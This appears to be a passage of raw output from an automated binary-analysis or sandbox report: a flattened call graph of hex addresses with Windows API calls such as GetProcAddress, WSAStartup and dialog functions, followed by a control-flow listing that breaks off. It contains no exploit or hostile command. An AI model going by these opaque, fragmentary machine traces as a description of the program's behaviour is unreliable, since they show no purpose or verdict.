7ff6786211e4 88798 7ff678611360 98 API calls 88796->88798 88799 7ff6786211bd 88797->88799 88800 7ff678621224 88797->88800 88801 7ff6786211f4 88798->88801 88802 7ff6785fa140 100 API calls 88799->88802 88959 7ff6785fa140 88800->88959 88803 7ff678611d70 134 API calls 88801->88803 88805 7ff6786211cf 88802->88805 88803->88793 88806 7ff6786114f0 98 API calls 88805->88806 88807 7ff678621240 88806->88807 88809 7ff678620d43 88808->88809 88815 7ff678620dbf 88808->88815 88813 7ff678620d60 88809->88813 88814 7ff678620ea2 88809->88814 88818 7ff678620e63 88809->88818 88820 7ff678620e82 88809->88820 88810 7ff678620e77 88810->88820 88822 7ff6786210d5 88810->88822 88997 7ff6785f9df0 100 API calls 88810->88997 88811 7ff67868a9f0 swprintf 8 API calls 88812 7ff67862115a 88811->88812 88812->88762 88813->88820 88973 7ff6785fa620 88813->88973 88821 7ff67868a9f0 swprintf 8 API calls 88814->88821 88815->88820 88993 7ff6785f9920 135 API calls swprintf 88815->88993 88816 7ff678620f25 88994 7ff678623ce0 161 API calls 88816->88994 88817 7ff678620f6b 88817->88810 88826 7ff678620f72 88817->88826 88818->88810 88818->88816 88818->88817 88820->88811 88846 7ff678620df9 88821->88846 89001 7ff678606fb0 137 API calls swprintf 88822->89001 88835 7ff678620f89 88826->88835 88842 7ff678621023 88826->88842 88829 7ff678620fe2 88833 7ff67862113c 88829->88833 88860 7ff678620fea 88829->88860 88830 7ff6786210e5 88831 7ff6786210f8 88830->88831 89002 7ff6785fa850 MessageBoxA 88830->89002 88837 7ff67860c930 136 API calls 88831->88837 88833->88820 89003 7ff6785fa840 MessageBeep 88833->89003 88834 7ff67868a9f0 swprintf 8 API calls 88834->88818 88995 7ff6785f9df0 100 API calls 88835->88995 88843 7ff67862110f 88837->88843 88838 7ff678620f38 88838->88820 88844 7ff6786125d0 98 API calls 88838->88844 88840 7ff678620d81 88845 7ff678620db2 88840->88845 88986 7ff6785f9b30 88840->88986 88842->88820 88850 7ff678621134 88842->88850 88853 7ff6786125d0 98 API calls 88842->88853 88851 7ff67860c930 136 API calls 88843->88851 88844->88820 88849 7ff67868a9f0 swprintf 8 API calls 88845->88849 88846->88834 88847 7ff678620f91 88847->88833 88848 7ff678620f99 88847->88848 88996 7ff67860d020 136 API calls 88848->88996 88849->88815 88855 7ff6786125d0 98 API calls 88850->88855 88854 7ff678621119 88851->88854 88858 7ff67862104c 88853->88858 88859 7ff6785fa880 161 API calls 88854->88859 88855->88833 88857 7ff678620fae 88861 7ff67860c930 136 API calls 88857->88861 88858->88850 88998 7ff6785f9560 98 API calls 88858->88998 88862 7ff678621125 88859->88862 88865 7ff67861a3a0 134 API calls 88860->88865 88863 7ff678620fb8 88861->88863 88866 7ff6785fa880 161 API calls 88862->88866 88867 7ff67860c930 136 API calls 88863->88867 88865->88822 88866->88820 88869 7ff678620fc2 88867->88869 88868 7ff678621061 88868->88850 88870 7ff678621069 88868->88870 88869->88862 88871 7ff678611020 134 API calls 88870->88871 88872 7ff67862106e 88871->88872 88999 7ff678623ce0 161 API calls 88872->88999 88874 7ff678621089 88875 7ff678621176 88874->88875 88877 7ff6786125d0 98 API calls 88874->88877 89004 7ff6785fa840 MessageBeep 88875->89004 88878 7ff6786210a4 88877->88878 88878->88875 88879 7ff6786210ac 88878->88879 89000 7ff678611100 134 API calls 88879->89000 88882 7ff678621288 88881->88882 88883 7ff6786212bf 88881->88883 88885 7ff67862138a 88882->88885 88888 7ff678611360 98 API calls 88882->88888 89013 7ff6785f9920 135 API calls swprintf 88883->89013 88886 7ff67868a9f0 swprintf 8 API calls 88885->88886 88889 7ff678621397 88886->88889 88887 7ff6786212ca 89014 7ff67869cb74 62 API calls _invalid_parameter_noinfo 88887->89014 88891 7ff67862129e 88888->88891 88889->88762 88892 7ff678621308 88891->88892 88893 7ff6786212a3 88891->88893 88895 7ff6785fa140 100 API calls 88892->88895 88896 7ff6785fa140 100 API calls 88893->88896 88894 7ff6786212d5 88899 7ff678611360 98 API calls 88894->88899 88897 7ff67862131a 88895->88897 88900 7ff6786212b5 88896->88900 88898 7ff678611360 98 API calls 88897->88898 88898->88900 88902 7ff6786212ec 88899->88902 88901 7ff678611360 98 API calls 88900->88901 88910 7ff6786212fe 88900->88910 88903 7ff678621338 88901->88903 88904 7ff67862134e 88902->88904 88905 7ff6786212f1 88902->88905 89015 7ff6785d1000 88903->89015 88907 7ff67868a9f0 swprintf 8 API calls 88904->88907 88908 7ff67868a9f0 swprintf 8 API calls 88905->88908 88907->88910 88908->88910 89007 7ff6785f9880 88910->89007 88912 7ff678611360 98 API calls 88911->88912 88913 7ff6786213d9 88912->88913 88914 7ff6786213e8 88913->88914 88915 7ff67862147a 88913->88915 88916 7ff67862159c 88914->88916 88919 7ff6786213fb 88914->88919 88920 7ff6786215a1 88914->88920 88917 7ff678621488 88915->88917 88918 7ff67862155f 88915->88918 88916->88762 88917->88916 88921 7ff6785fa620 99 API calls 88917->88921 88918->88916 89041 7ff6785f95c0 99 API calls 88918->89041 88919->88916 89029 7ff6785f9670 101 API calls 88919->89029 88920->88916 89036 7ff6785f9df0 100 API calls 88920->89036 88923 7ff67862149d 88921->88923 88927 7ff6785f9a60 99 API calls 88923->88927 88925 7ff6786215b6 88925->88916 89037 7ff6785f9d30 99 API calls 88925->89037 88929 7ff6786214a8 88927->88929 88928 7ff678621419 88931 7ff67862143d 88928->88931 89030 7ff67869b8ac 98 API calls 4 library calls 88928->89030 88935 7ff6786214d2 88929->88935 89033 7ff67869b8ac 98 API calls 4 library calls 88929->89033 88941 7ff678621473 88931->88941 89031 7ff6785f9df0 100 API calls 88931->89031 88934 7ff6786215cc 89038 7ff6785f95c0 99 API calls 88934->89038 88936 7ff678621536 88935->88936 88938 7ff67862153f 88935->88938 89022 7ff6785f9c10 88935->89022 88936->88938 89034 7ff6785f9fd0 99 API calls 88938->89034 88941->88916 88944 7ff678611b80 134 API calls 88941->88944 88942 7ff67862145c 88942->88916 89032 7ff6785f9d30 99 API calls 88942->89032 88949 7ff6786215fb 88944->88949 88945 7ff67862154f 89035 7ff6785fa6a0 101 API calls 88945->89035 88948 7ff67862155a 88948->88916 88950 7ff67862162e 88949->88950 89039 7ff67869b8ac 98 API calls 4 library calls 88949->89039 88952 7ff67862164c 88950->88952 89040 7ff67869b8ac 98 API calls 4 library calls 88950->89040 88954 7ff678611360 98 API calls 88952->88954 88955 7ff678621659 88954->88955 88956 7ff678621675 88955->88956 88958 7ff678611b80 134 API calls 88955->88958 88957 7ff6785fa880 161 API calls 88956->88957 88957->88918 88958->88956 88960 7ff6785fa195 88959->88960 88963 7ff6785fa15c 88959->88963 88970 7ff67869b8ac 98 API calls 4 library calls 88960->88970 88962 7ff6786157e0 98 API calls 88962->88963 88963->88960 88963->88962 88964 7ff6785fa1ae 88963->88964 88971 7ff67869b8ac 98 API calls 4 library calls 88964->88971 88966 7ff6785fa257 88972 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 88966->88972 88968 7ff6785fa25c 88969->88796 88970->88964 88971->88966 88972->88968 88974 7ff6785fa665 88973->88974 88976 7ff6785fa62f 88973->88976 88979 7ff6785f9a60 88974->88979 88975 7ff6786157e0 98 API calls 88975->88976 88976->88974 88976->88975 88977 7ff6785fa667 88976->88977 88977->88974 88978 7ff6785fa66f SendDlgItemMessageA 88977->88978 88978->88974 88980 7ff6785f9aa5 88979->88980 88981 7ff6785f9a74 88979->88981 88984 7ff6785f9ac0 SendDlgItemMessageA 88980->88984 89005 7ff67869b8ac 98 API calls 4 library calls 88980->89005 88981->88980 88983 7ff6786157e0 98 API calls 88981->88983 88983->88981 88984->88840 88987 7ff6785f9b49 88986->88987 88992 7ff6785f9b86 88986->88992 88989 7ff6786157e0 98 API calls 88987->88989 88987->88992 88989->88987 88990 7ff6785f9ba1 SendDlgItemMessageA 88990->88840 88992->88990 89006 7ff67869b8ac 98 API calls 4 library calls 88992->89006 88993->88846 88994->88838 88995->88847 88996->88857 88997->88829 88998->88868 88999->88874 89000->88820 89001->88830 89005->88984 89006->88990 89008 7ff6785f98d5 89007->89008 89012 7ff6785f9899 89007->89012 89011 7ff6785f98fd SetDlgItemTextA 89008->89011 89021 7ff67869b8ac 98 API calls 4 library calls 89008->89021 89009 7ff6786157e0 98 API calls 89009->89012 89012->89008 89012->89009 89013->88887 89014->88894 89016 7ff6785d1035 swprintf 89015->89016 89017 7ff67868cfe8 63 API calls 89016->89017 89018 7ff6785d105c 89017->89018 89019 7ff67868a9f0 swprintf 8 API calls 89018->89019 89020 7ff6785d1075 89019->89020 89020->88910 89021->89011 89025 7ff6785f9c2d 89022->89025 89027 7ff6785f9c69 89022->89027 89023 7ff6786157e0 98 API calls 89023->89025 89025->89023 89025->89027 89026 7ff6785f9c84 SendDlgItemMessageA SendDlgItemMessageA 89026->88935 89027->89026 89042 7ff67869b8ac 98 API calls 4 library calls 89027->89042 89029->88928 89030->88931 89031->88942 89032->88941 89033->88935 89034->88945 89035->88948 89036->88925 89037->88934 89039->88950 89040->88952 89042->89026 89043 7ff67860aef4 89044 7ff67860aefc 89043->89044 89383 7ff678611a90 89044->89383 89046 7ff67860af3d 89047 7ff678611d70 134 API calls 89046->89047 89050 7ff67860af50 89047->89050 89048 7ff67860af06 89048->89046 89049 7ff67861a3a0 134 API calls 89048->89049 89049->89046 89396 7ff67860cd00 89050->89396 89053 7ff678611b80 134 API calls 89054 7ff67860af8a 89053->89054 89055 7ff67860cd00 9 API calls 89054->89055 89056 7ff67860afac 89055->89056 89057 7ff678611b80 134 API calls 89056->89057 89058 7ff67860afbc 89057->89058 89402 7ff67860cd50 89058->89402 89060 7ff67860afcb 89422 7ff678612190 89060->89422 89062 7ff67860aff2 89063 7ff67860cd00 9 API calls 89062->89063 89064 7ff67860b019 89063->89064 89065 7ff678611b80 134 API calls 89064->89065 89066 7ff67860b029 89065->89066 89067 7ff67860cd00 9 API calls 89066->89067 89068 7ff67860b04b 89067->89068 89069 7ff678611b80 134 API calls 89068->89069 89071 7ff67860b05b 89069->89071 89070 7ff67860b081 89072 7ff678611a90 134 API calls 89070->89072 89071->89070 89073 7ff67860cd00 9 API calls 89071->89073 89074 7ff67860b096 89072->89074 89073->89070 89075 7ff67860b0bc 89074->89075 89076 7ff67860cd00 9 API calls 89074->89076 89077 7ff678611a90 134 API calls 89075->89077 89076->89075 89079 7ff67860b0d1 89077->89079 89078 7ff67860b0f7 89080 7ff678611a90 134 API calls 89078->89080 89079->89078 89081 7ff67860cd00 9 API calls 89079->89081 89083 7ff67860b10c 89080->89083 89081->89078 89082 7ff67860b132 89085 7ff678611a90 134 API calls 89082->89085 89083->89082 89084 7ff67860cd00 9 API calls 89083->89084 89084->89082 89086 7ff67860b147 89085->89086 89087 7ff67860b16d 89086->89087 89089 7ff67860cd00 9 API calls 89086->89089 89088 7ff678611a90 134 API calls 89087->89088 89090 7ff67860b182 89088->89090 89089->89087 89091 7ff67860cd00 9 API calls 89090->89091 89092 7ff67860b1a9 89091->89092 89093 7ff678611b80 134 API calls 89092->89093 89098 7ff67860b1ba 89093->89098 89094 7ff6785d1000 63 API calls 89094->89098 89096 7ff67861a3a0 134 API calls 89096->89098 89097 7ff678611c70 134 API calls 89097->89098 89098->89094 89098->89096 89098->89097 89099 7ff67860b2c0 89098->89099 89437 7ff6785d6e80 62 API calls swprintf 89098->89437 89100 7ff67860b2eb 89099->89100 89101 7ff67860cd00 9 API calls 89099->89101 89102 7ff678611a90 134 API calls 89100->89102 89101->89100 89104 7ff67860b300 89102->89104 89103 7ff67860b326 89105 7ff678611a90 134 API calls 89103->89105 89104->89103 89106 7ff67860cd00 9 API calls 89104->89106 89108 7ff67860b33b 89105->89108 89106->89103 89107 7ff67860b361 89110 7ff678611a90 134 API calls 89107->89110 89108->89107 89109 7ff67860cd00 9 API calls 89108->89109 89109->89107 89111 7ff67860b376 89110->89111 89112 7ff67860cd00 9 API calls 89111->89112 89113 7ff67860b395 89112->89113 89114 7ff678611b80 134 API calls 89113->89114 89115 7ff67860b3a5 89114->89115 89116 7ff67860b3cb 89115->89116 89117 7ff67860cd00 9 API calls 89115->89117 89118 7ff678611a90 134 API calls 89116->89118 89117->89116 89120 7ff67860b3e0 89118->89120 89119 7ff67860b406 89122 7ff678611a90 134 API calls 89119->89122 89120->89119 89121 7ff67860cd00 9 API calls 89120->89121 89121->89119 89124 7ff67860b41b 89122->89124 89123 7ff67860b441 89126 7ff678611a90 134 API calls 89123->89126 89124->89123 89125 7ff67860cd00 9 API calls 89124->89125 89125->89123 89130 7ff67860b456 89126->89130 89127 7ff6785d1000 63 API calls 89127->89130 89129 7ff67861a3a0 134 API calls 89129->89130 89130->89127 89130->89129 89133 7ff67860b530 89130->89133 89438 7ff67869cb74 62 API calls _invalid_parameter_noinfo 89130->89438 89439 7ff678611c70 134 API calls 89130->89439 89132 7ff67860b556 89135 7ff678611a90 134 API calls 89132->89135 89133->89132 89134 7ff67860cd00 9 API calls 89133->89134 89134->89132 89136 7ff67860b56b 89135->89136 89440 7ff67860c870 134 API calls 89136->89440 89384 7ff6786134f0 134 API calls 89383->89384 89385 7ff678611ab4 89384->89385 89386 7ff678611ae0 89385->89386 89441 7ff67869b8ac 98 API calls 4 library calls 89385->89441 89388 7ff678611b06 89386->89388 89442 7ff67869b8ac 98 API calls 4 library calls 89386->89442 89390 7ff678614b00 134 API calls 89388->89390 89391 7ff678611b17 89390->89391 89395 7ff678611b42 89391->89395 89443 7ff678616140 98 API calls swprintf 89391->89443 89393 7ff678611b2f 89394 7ff678614b00 134 API calls 89393->89394 89394->89395 89395->89048 89397 7ff67860cd1c 89396->89397 89398 7ff67860cd29 89396->89398 89444 7ff678616680 9 API calls swprintf 89397->89444 89400 7ff67868a9f0 swprintf 8 API calls 89398->89400 89401 7ff67860af7a 89400->89401 89401->89053 89403 7ff67860cd78 89402->89403 89421 7ff67860ce73 89402->89421 89445 7ff678616750 134 API calls swprintf 89403->89445 89405 7ff67860cd86 89408 7ff678612610 134 API calls 89405->89408 89405->89421 89406 7ff67868a9f0 swprintf 8 API calls 89407 7ff67860ce8f 89406->89407 89407->89060 89409 7ff67860cda6 89408->89409 89446 7ff678616680 9 API calls swprintf 89409->89446 89411 7ff67860cdb9 89412 7ff678612610 134 API calls 89411->89412 89411->89421 89413 7ff67860cdf0 89412->89413 89447 7ff678616680 9 API calls swprintf 89413->89447 89415 7ff67860ce03 89416 7ff678612610 134 API calls 89415->89416 89415->89421 89417 7ff67860ce32 89416->89417 89448 7ff678616680 9 API calls swprintf 89417->89448 89419 7ff67860ce45 89419->89421 89449 7ff6786266a0 134 API calls 89419->89449 89421->89406 89423 7ff6786134f0 134 API calls 89422->89423 89424 7ff6786121b4 89423->89424 89425 7ff6786121e0 89424->89425 89455 7ff67869b8ac 98 API calls 4 library calls 89424->89455 89427 7ff678612206 89425->89427 89456 7ff67869b8ac 98 API calls 4 library calls 89425->89456 89450 7ff6786266f0 89427->89450 89431 7ff678614b00 134 API calls 89432 7ff67861221f 89431->89432 89433 7ff67861224a 89432->89433 89457 7ff678616140 98 API calls swprintf 89432->89457 89433->89062 89435 7ff678612237 89436 7ff678614b00 134 API calls 89435->89436 89436->89433 89437->89098 89438->89130 89439->89130 89441->89386 89442->89388 89443->89393 89444->89398 89445->89405 89446->89411 89447->89415 89448->89419 89449->89421 89451 7ff6786134f0 134 API calls 89450->89451 89452 7ff678626715 89451->89452 89453 7ff67861a3a0 134 API calls 89452->89453 89454 7ff678612210 89453->89454 89454->89431 89455->89425 89456->89427 89457->89435 89458 7ff6785f50b0 89459 7ff6786162c0 134 API calls 89458->89459 89460 7ff6785f50c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89459->89460 89461 7ff6785f29f0 CreateDialogParamA ShowWindow SetActiveWindow DestroyWindow 89462 7ff6785f728f 89463 7ff6785f8560 135 API calls 89462->89463 89464 7ff6785f729e 89463->89464 89465 7ff6785f72f7 89464->89465 89466 7ff6785f72e6 SendMessageA 89464->89466 89467 7ff6785f51e0 4 API calls 89465->89467 89466->89465 89468 7ff6785f734d 89467->89468 89469 7ff6786134f0 134 API calls 89468->89469 89488 7ff6785f68b4 89468->89488 89470 7ff6785f7fd3 89469->89470 89471 7ff6785f802f 89470->89471 89473 7ff678614b00 134 API calls 89470->89473 89472 7ff678614b00 134 API calls 89471->89472 89475 7ff6785f8040 89472->89475 89474 7ff6785f8011 89473->89474 89474->89471 89506 7ff67869b8ac 98 API calls 4 library calls 89474->89506 89480 7ff6785f805e 89475->89480 89507 7ff67869b8ac 98 API calls 4 library calls 89475->89507 89479 7ff6785f84ac 89483 7ff67868a9f0 swprintf 8 API calls 89479->89483 89491 7ff6785f80d0 89480->89491 89508 7ff6786a11ac 63 API calls 89480->89508 89509 7ff67869b8ac 98 API calls 4 library calls 89480->89509 89481 7ff67869b8ac 98 API calls 89481->89488 89482 7ff6785f83b8 89482->89479 89486 7ff6785f51e0 4 API calls 89482->89486 89487 7ff6785f84c1 89483->89487 89485 7ff6786157e0 98 API calls 89485->89491 89486->89479 89488->89481 89488->89482 89489 7ff6785f851c 89488->89489 89514 7ff67869b8ac 98 API calls 4 library calls 89489->89514 89490 7ff6785f8150 GetDlgItem 89490->89491 89491->89485 89491->89488 89491->89490 89502 7ff6785f81c0 89491->89502 89510 7ff67869b8ac 98 API calls 4 library calls 89491->89510 89511 7ff67869b8ac 98 API calls 4 library calls 89491->89511 89494 7ff6785f8535 89515 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 89494->89515 89497 7ff6785f853a 89498 7ff6786157e0 98 API calls 89498->89502 89499 7ff6785f828e GetDlgItem 89499->89502 89502->89488 89502->89498 89502->89499 89503 7ff6785f832c GetDlgItem 89502->89503 89504 7ff6785f834c ScreenToClient 89502->89504 89512 7ff67869b8ac 98 API calls 4 library calls 89502->89512 89513 7ff67869b8ac 98 API calls 4 library calls 89502->89513 89503->89502 89504->89502 89505 7ff6785f8380 SetWindowPos 89504->89505 89505->89502 89506->89471 89507->89480 89508->89480 89509->89480 89510->89490 89511->89491 89512->89499 89513->89502 89514->89494 89515->89497 89516 7ff6785f738d 89517 7ff6785f8560 135 API calls 89516->89517 89518 7ff6785f739c 89517->89518 89519 7ff6785f7855 89518->89519 89520 7ff6785f73b7 89518->89520 89522 7ff6785f7862 89519->89522 89523 7ff6785f7cac 89519->89523 89521 7ff6786134f0 134 API calls 89520->89521 89527 7ff6785f73c9 89521->89527 89524 7ff6785f78e5 89522->89524 89528 7ff6785f51e0 4 API calls 89522->89528 89525 7ff6785f7cbd 89523->89525 89526 7ff6785f7dd9 89523->89526 89529 7ff6785f51e0 4 API calls 89524->89529 89530 7ff6785f7d1d 89525->89530 89534 7ff6785f51e0 4 API calls 89525->89534 89532 7ff6785f51e0 4 API calls 89526->89532 89577 7ff6785f5a20 12 API calls swprintf 89527->89577 89528->89524 89533 7ff6785f73f8 89529->89533 89535 7ff6785f51e0 4 API calls 89530->89535 89532->89530 89536 7ff6786134f0 134 API calls 89533->89536 89537 7ff6785f7f97 89533->89537 89534->89530 89535->89533 89539 7ff6785f7f16 SendDlgItemMessageA 89536->89539 89540 7ff6786134f0 134 API calls 89537->89540 89559 7ff6785f68b4 89537->89559 89539->89537 89541 7ff6785f7fd3 89540->89541 89542 7ff6785f802f 89541->89542 89544 7ff678614b00 134 API calls 89541->89544 89543 7ff678614b00 134 API calls 89542->89543 89546 7ff6785f8040 89543->89546 89545 7ff6785f8011 89544->89545 89545->89542 89578 7ff67869b8ac 98 API calls 4 library calls 89545->89578 89553 7ff6785f805e 89546->89553 89579 7ff67869b8ac 98 API calls 4 library calls 89546->89579 89549 7ff6785f84ac 89552 7ff67868a9f0 swprintf 8 API calls 89549->89552 89551 7ff6785f83b8 89551->89549 89554 7ff6785f51e0 4 API calls 89551->89554 89555 7ff6785f84c1 89552->89555 89568 7ff6785f80d0 89553->89568 89580 7ff6786a11ac 63 API calls 89553->89580 89581 7ff67869b8ac 98 API calls 4 library calls 89553->89581 89554->89549 89557 7ff6786157e0 98 API calls 89557->89568 89558 7ff6785f851c 89586 7ff67869b8ac 98 API calls 4 library calls 89558->89586 89559->89551 89559->89558 89562 7ff67869b8ac 98 API calls 89559->89562 89561 7ff6785f8150 GetDlgItem 89561->89568 89562->89559 89563 7ff6785f8535 89587 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 89563->89587 89567 7ff6785f853a 89568->89557 89568->89559 89568->89561 89573 7ff6785f81c0 89568->89573 89582 7ff67869b8ac 98 API calls 4 library calls 89568->89582 89583 7ff67869b8ac 98 API calls 4 library calls 89568->89583 89569 7ff6786157e0 98 API calls 89569->89573 89570 7ff6785f828e GetDlgItem 89570->89573 89573->89559 89573->89569 89573->89570 89574 7ff6785f832c GetDlgItem 89573->89574 89575 7ff6785f834c ScreenToClient 89573->89575 89584 7ff67869b8ac 98 API calls 4 library calls 89573->89584 89585 7ff67869b8ac 98 API calls 4 library calls 89573->89585 89574->89573 89575->89573 89576 7ff6785f8380 SetWindowPos 89575->89576 89576->89573 89577->89533 89578->89542 89579->89553 89580->89553 89581->89553 89582->89561 89583->89568 89584->89570 89585->89573 89586->89563 89587->89567 89588 7ff6785fa20c 89589 7ff6785f8560 135 API calls 89588->89589 89590 7ff6785fa219 89589->89590 89591 7ff6785fa230 89590->89591 89592 7ff6785fa1eb SetWindowTextA 89590->89592 89592->89588 89593 7ff67860e2c0 89594 7ff6786162c0 134 API calls 89593->89594 89595 7ff67860e2d0 89594->89595 89596 7ff67860e2ff GetProcAddress 89595->89596 89597 7ff6786162c0 134 API calls 89595->89597 89598 7ff67860e35e 89596->89598 89599 7ff67860e314 89596->89599 89600 7ff67860e2ef 89597->89600 89602 7ff6786162c0 134 API calls 89598->89602 89601 7ff67860e324 GetProcAddress 89599->89601 89609 7ff67860e3c8 89599->89609 89600->89596 89603 7ff67860ea07 89600->89603 89604 7ff67860e348 GetProcAddress 89601->89604 89601->89609 89605 7ff67860e36a 89602->89605 89657 7ff6785d6000 134 API calls 89603->89657 89607 7ff67860e3ad 89604->89607 89608 7ff67860e376 GetProcAddress 89605->89608 89605->89609 89607->89609 89612 7ff67860e3b9 GetProcAddress 89607->89612 89608->89609 89610 7ff67860e399 GetProcAddress 89608->89610 89613 7ff67860e402 89609->89613 89614 7ff67860e3f3 GetProcAddress 89609->89614 89610->89607 89611 7ff67860ea13 89658 7ff6785d6000 134 API calls 89611->89658 89612->89609 89617 7ff67860e41b GetProcAddress 89613->89617 89638 7ff67860e841 89613->89638 89614->89613 89618 7ff67860e43f GetProcAddress 89617->89618 89617->89638 89619 7ff67860e463 GetProcAddress 89618->89619 89618->89638 89620 7ff67860e487 GetProcAddress 89619->89620 89619->89638 89621 7ff67860e4ab GetProcAddress 89620->89621 89620->89638 89622 7ff67860e4cf GetProcAddress 89621->89622 89621->89638 89623 7ff67860e4f3 GetProcAddress 89622->89623 89622->89638 89624 7ff67860e517 GetProcAddress 89623->89624 89623->89638 89625 7ff67860e53b GetProcAddress 89624->89625 89624->89638 89626 7ff67860e55f GetProcAddress 89625->89626 89625->89638 89627 7ff67860e583 GetProcAddress 89626->89627 89626->89638 89628 7ff67860e5a7 GetProcAddress 89627->89628 89627->89638 89629 7ff67860e5cb GetProcAddress 89628->89629 89628->89638 89630 7ff67860e5ef GetProcAddress 89629->89630 89629->89638 89631 7ff67860e613 GetProcAddress 89630->89631 89630->89638 89632 7ff67860e637 GetProcAddress 89631->89632 89631->89638 89633 7ff67860e65b GetProcAddress 89632->89633 89632->89638 89634 7ff67860e67f GetProcAddress 89633->89634 89633->89638 89635 7ff67860e6a3 GetProcAddress 89634->89635 89634->89638 89636 7ff67860e6c7 GetProcAddress 89635->89636 89635->89638 89637 7ff67860e6eb GetProcAddress 89636->89637 89636->89638 89637->89638 89639 7ff67860e70f GetProcAddress 89637->89639 89648 7ff67860e982 WSAStartup 89638->89648 89639->89638 89640 7ff67860e733 GetProcAddress 89639->89640 89640->89638 89641 7ff67860e757 GetProcAddress 89640->89641 89641->89638 89642 7ff67860e77b GetProcAddress 89641->89642 89642->89638 89643 7ff67860e79f GetProcAddress 89642->89643 89643->89638 89644 7ff67860e7c3 GetProcAddress 89643->89644 89644->89638 89645 7ff67860e7e7 GetProcAddress 89644->89645 89645->89638 89646 7ff67860e80b GetProcAddress 89645->89646 89646->89638 89647 7ff67860e82f GetProcAddress 89646->89647 89647->89648 89649 7ff67860e9ab WSAStartup 89648->89649 89650 7ff67860e99e 89648->89650 89652 7ff67860e9cd WSAStartup 89649->89652 89653 7ff67860e9c0 89649->89653 89650->89649 89651 7ff67860e9ef 89650->89651 89655 7ff678614a20 134 API calls 89651->89655 89652->89611 89654 7ff67860e9e2 89652->89654 89653->89651 89653->89652 89654->89611 89654->89651 89656 7ff67860e9fb 89655->89656

                      Executed Functions

                      Function 00007FF67861BD50 Relevance: 710.4, Strings: 565, Instructions: 4164COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 7ff67861bd50-7ff67861bee3 call 7ff678625550 call 7ff67861a3a0 call 7ff678625360 call 7ff678625680 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625c30 call 7ff678612890 call 7ff6786251e0 call 7ff678613590 23 7ff67861bef1-7ff67861c0cf call 7ff6786255e0 call 7ff678625360 call 7ff678625680 call 7ff678624e40 * 2 call 7ff678625800 call 7ff678624e40 * 2 call 7ff678625800 call 7ff678625680 call 7ff6786262b0 call 7ff678625680 call 7ff678624e50 call 7ff678625a00 call 7ff678613530 * 3 0->23 24 7ff67861bee5-7ff67861beec 0->24 104 7ff67861c0ea-7ff67861c0f9 23->104 105 7ff67861c0d1-7ff67861c0e5 call 7ff67869b8ac 23->105 25 7ff67861c2c1-7ff67861c3b7 call 7ff678625360 call 7ff678625680 call 7ff67860c930 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678625680 * 2 call 7ff678624e50 call 7ff678625d10 24->25 68 7ff67861c3b9-7ff67861c3c1 25->68 69 7ff67861c3c3-7ff67861c3f2 call 7ff678624e50 call 7ff678625c30 25->69 71 7ff67861c3f9-7ff67861c432 call 7ff678624e50 call 7ff678625c30 68->71 69->71 84 7ff67861c43e-7ff67861c46d call 7ff678624e50 call 7ff678625c30 71->84 85 7ff67861c434-7ff67861c43c 71->85 87 7ff67861c474-7ff67861c59c call 7ff678625680 call 7ff678625360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff6786251e0 call 7ff678625360 84->87 85->87 147 7ff67861c5b7-7ff67861c830 call 7ff678624e40 * 6 call 7ff678625a00 call 7ff678624e40 call 7ff678626020 call 7ff6786262b0 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 87->147 148 7ff67861c59e-7ff67861c5a0 87->148 107 7ff67861c0fb-7ff67861c117 call 7ff67869b8ac 104->107 108 7ff67861c11d-7ff67861c12b 104->108 105->104 107->108 118 7ff67861c1c7 107->118 112 7ff67861c167-7ff67861c16d 108->112 115 7ff67861c16f-7ff67861c17f call 7ff67869b8ac 112->115 116 7ff67861c184-7ff67861c1a5 call 7ff67861a3a0 112->116 115->116 124 7ff67861c1a7-7ff67861c1aa 116->124 125 7ff67861c1c0-7ff67861c1c2 116->125 122 7ff67861c1ca-7ff67861c1e0 118->122 127 7ff67861c1fb-7ff67861c2ba call 7ff67861a3a0 call 7ff678624e40 call 7ff678624e50 call 7ff678625e10 call 7ff678625680 122->127 128 7ff67861c1e2-7ff67861c1f6 call 7ff67869b8ac 122->128 129 7ff67861c1ac-7ff67861c1bb 124->129 130 7ff67861c130 124->130 131 7ff67861c132-7ff67861c165 call 7ff678624e40 125->131 127->25 128->127 129->131 130->131 131->112 131->122 195 7ff67861c84f-7ff67861c8c3 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 147->195 196 7ff67861c832-7ff67861c83a 147->196 151 7ff67861c5b1-7ff67861c5b4 148->151 152 7ff67861c5a2-7ff67861c5af call 7ff678606f20 148->152 151->147 152->147 152->151 197 7ff67861c8c8-7ff67861d521 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678625360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678625360 call 7ff678624e50 * 2 call 7ff678625900 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 * 8 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678625360 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678624e50 call 7ff678625a00 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786262b0 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 call 